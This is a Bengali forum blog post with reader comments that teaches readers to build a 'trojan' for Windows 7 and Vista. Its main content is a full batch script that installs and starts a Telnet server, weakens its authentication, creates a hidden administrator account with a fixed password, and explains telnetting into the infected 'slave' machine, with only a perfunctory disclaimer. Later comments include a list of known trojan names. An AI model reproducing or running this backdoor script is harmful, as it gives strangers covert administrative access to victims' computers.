উইন্ডোজ ৭ এং ভিস্তার জন্য ট্রোজান বানাতে হলে নিচের কোড টা কপি করে নোটপ্যাড এ পেস্ট করুন এবং যেকোনো নাম দিয়ে .bat এক্সটেন্সান হিসেবে সেভ করুন ।
@echo off
pkgmgr /iu:“TelnetClient”
pkgmgr /iu:“TelnetServer”
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user tunerpage /add
net user tunerpage 12345
net localgroup administrators tunerpage /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v tunerpage /t REG_DWORD /d 00
একবার ইন্সটল হয়ে গেলে বা ট্রোজান টি স্লেভ কম্পিউটার এ নিজেকে স্থাপন করে ফেললে Telnet Client আছে এমন যেকোনো সার্ভার থেকে নিচের কোড এর মাধ্যমে স্লেভ কম্পিউটার এ অ্যাক্সেস করতে পারবেন । শুধু slave’s IP address এর জায়গা তে স্লেভ এর আসল আই পি দিলেই কাজ হবে :D
C:\>telnet<slave’s IP address>
বিশেষ দ্রষ্টব্য : উপরের কোডিং টা খুব ই নিম্ন মানের এবং আদিম কালের ট্রোজান । এটা যেকোনো অ্যান্টিভাইরাস এর কাছে ধরা খাবে :P তারপর ও বলি , এই কোডিং দেওয়ার উদ্দেশ্য শুধুই শেখার জন্য । আপনি যদি কারো ক্ষতি করার উদ্দেশে এটা ব্যবহার করতে চান তাহলে দয়া করে নিজ দায়িত্বে করবেন । আমাকে বা টিউনার পেজ কে কোনভাবেই দায়ী করা যাবে না :)
মোটামুটি এই ছিল ট্রোজান নিয়ে বিস্তারিত আলোচনা । আশা করি আপনারা নতুন কিছু শিখতে পেরেছেন । যদি টা হয় অথবা যদি আপনাদের ভালো লেগে থাকে দয়া করে কমেন্ট করে জানাবেন । আর আপনাদের ও যদি কিছু জানতে ইচ্ছা হয় কমেন্ট এ বলবেন । ইনশাআল্লাহ আমি টিউন করার চেষ্টা করব । আগামী টিউন এর জন্য অপেক্ষায় থাকুন । সে পর্যন্ত সবাই সুস্থ থাকুন , ভালো থাকুন । আল্লাহ হাফেয :)
অসাধারন উপকারী টিউন। আসুন না ট্রোজানকে রিমুভ করার জন্য একটা ট্রোজান তৈরী করি। অর্থাৎ এটি বানানোর একটা পদ্ধতি থাকবে। পদ্ধতিটার একটা অংশ থাকবে কাস্টমাইজ করার জন্য। যা প্রত্যেকে তার কম্পিউটার বা সিস্টেম আই ডি বসিয়ে দিলে তার সিস্টেমকে সে অন্য ট্রোজান থেকে রক্ষা করবে অর্থাৎ অন্য ট্রোজানগুলোকে রিমুভ করে দেবে – এইরকম আর কি। মানে অনেকটা ট্রোজান হয়ে ট্রোজান খুঁজে বের করে সিস্টেমকে বাঁচাবে। তৈরী করা ট্রোজানটা স্পাই – এর কাজ করবে।
আমি হাকিং – এর কিছুই জানিনা তবে আপনার টিউন পরে আমার ধারনা হল আপনি চেষ্টা করলে এমন একটা স্পাই ট্রোজান তৈরী করতে পারবেন ইনশাল্লাহ। আমি শুধু এই ”ক্লু”টা দিলাম। ভুল হলে ক্ষমা করবেন। ধন্যবাদ আবারও…
Onek boro post kotokkon legeche bolben ki eta likte………thanks for share….
অসাধারন হয়েছে। তবে আমার তৈরিকৃত ট্রোজান ভাইরাস্তি কি আমার পিসির কোন ক্ষতি করবে?
অনেক ধন্যবাদ।
ভাই যান। এই ভাবে যদি লিখতে থাকেন তাহলে আমি নির্ঘাত Hacker হয়ে যাবো। রক্ত গরম হয়ে যাচ্ছে। :/
হ্যাকার হতে পারবেন কিনা জানিনা তবে পার্সোনাল সিক্যুরিটি তে টপ ক্লাস হবেন এটার গ্যারান্টি দিতে পারি :দ
স্লেভ কম্পিউটার , talent client – এসব কি ???
স্লেভ কম্পিউটার মানে আপনি যে কম্পিউটার কে আক্রান্ত করতে চান & Talent client না ওটা telnet client । এটা একটা টার্মিনাল পোর্ট ইন্টারনেট কানেকশন এর জন্য । এটা সম্পর্কে আরো জানতে নিচের লিঙ্ক থেকে ঘুরে আসতে পারেন
http://en.wikipedia.org/wiki/Telnet
ফাটাফাটি পোস্ট… প্রিয়তে নিলাম… পরে সময় করে পড়ব… এরকম ব্যাসিক পোস্ট আরো চাই…
ইনশাল্লাহ আরও লিখব :D সাথেই থাকুন :D
বাফ রে ! এতো ছডু ফুস্ট ! o_o সত্যি কথা কইতে, শেষে আইতে আইতে পরথমের কথা খাইয়া ফেলছি। আবার পরুম এখন।
তবে যেইটুক মাথায় ঢুকছে, বুঝলাম কামের জিনিস :D
ওই ট্রোজান পোর্ট এর লিস্ট টার জন্য টিউন টাকে বেশি বড় মনে হচ্ছে :(
:@ হ হ বুঝছি !
অনির্বাচিত টিউনার মন্তব্য করে নাই এই পোষ্ট। যা দেখে খুবই ব্যথিত হলাম :)
আপনার পোষ্ট অনেক অনেক চমৎকার হয়। যা বলার অপেক্ষা রাখে না। আসলে আপনার পোষ্টগুলো পড়েছি। কিন্তু মন্তব্য করতে পারি নি সময়ের কারণে :) চালিয়ে যান আপনার এই চরম ধারাবাহিক। আশা করি নিয়মিত লিখে যাবেন এটি :)
ধন্যবাদ অনির্বাচিত টিউনার :D আপনার মতামত , মন্তব্য সব সময় আমার জন্য অনেক উৎসাহব্যঞ্জক । অনেক অনেক ধন্যবাদ মূল্যবান মতামতের জন্য :)
খুবই ভালো পোষ্ট। আপনাকে অসংখ্য ধন্যবাদ ।
আপনাকেও
ভাল লাগল।
আপনাদের ভালো লাগাতেই আমার লেখা সার্থক :)
অনেক ধন্যবাদ
মতামত দেওয়ার জন্য আপনাকেও অনেক ধন্যবাদ :D
http://gullee.com/smilies/62.gif
কঠিন একটা স্মাইলি দিলেন :D খুশি হয়ে গেলাম :D
লিনাক্সে কি ট্রোজান এটাক করে???
জি করে :)
খুবই ভালো পোষ্ট।আপনি যদি ট্রোজেন খেকে বাচাঁর উপায় দিয়েছেন যদি ট্রোজেন থেকে বাঁচার সফটওয়্যার দিতেন তবে খুশি হতাম
কেন আপনার অ্যান্টিভাইরাস এই তো কাজ করার কথা !! যদি না হয় তাহলে তো্ নিজে কিভাবে করবেন ওটাও তো বলে দিলাম :D
ধন্যবাদ ভাই
:)
আমি এক্সপি ইউজার PID এর লিস্ট এ 1080 খুজে পেলাম এখন কি করব । {kasperskey internet Security 2012 চালাই অনির্বাচিত টিউনারের দেয়া ৩৫০ দিনের কী ফাইল দিয়া }
1080 মূলত proxy পোর্ট !আপনি কি বস কোন আই পি চেঞ্জার ব্যবহার করেন ? অথবা কোন P2P নেটওয়ার্ক এ আছেন [ যেমন e-mule ]? অথবা আপনি কি শেয়ারিং আই পি ব্যবহার করছেন ?
উপর উত্তর গুলো একটু দিবেন দয়া করে । আর windows task manager ওপেন করে services ট্যাব থেকে PID মিলিয়ে দেখুন তো নিচের প্রোগ্রাম গুলোর সাথে । একটুঁ জানান তো এগুলোর একটাও মিলে কিনা ? তার পর বলছি কি হয়েছে :/
Bugbear.xx
SubSeven
WinHole
Trojan.Webus.C
Mydoom.B
Wingate
Bagle
Backdoor.WLF
BackGate
SubSeven 2.2
Lixy
Mydoom
W32.Beagle
W32.HLLW.Deadhat
Webus
মজিলার proxy এডঅন ইনেস্টল করা ছিল কিন্তু কোন দিন ব্যাবহার করা হয়নি । রিমুভ করে দেয়ার পর আর দেখায় না । আপনাকে অসংখ্য ধন্যবাদ ।
আপনাকেও অনেক ধন্যবাদ :)
Thanks for this nice post….trojan virus somporke kono bistarito boi ki pawa somvob?……ami autorun virus dea pendrive ar logo chenge korte pari …bt kharap hok r valo hok ami ro sekhte chi…please help.
আমি ঠিক জানি না কোন বই পাওয়া যায় কিন্তু কিন্তু পেলে অবশ্যই আপনাকে জানাব । আপনার মতামতের জন্য ধন্যবাদ